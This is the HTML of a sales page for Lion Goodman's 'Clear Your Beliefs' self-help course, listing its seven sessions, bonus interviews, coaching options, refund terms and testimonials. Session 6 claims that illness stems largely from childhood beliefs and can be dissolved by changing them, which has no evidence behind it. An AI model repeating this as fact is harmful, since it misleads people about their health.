<strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" 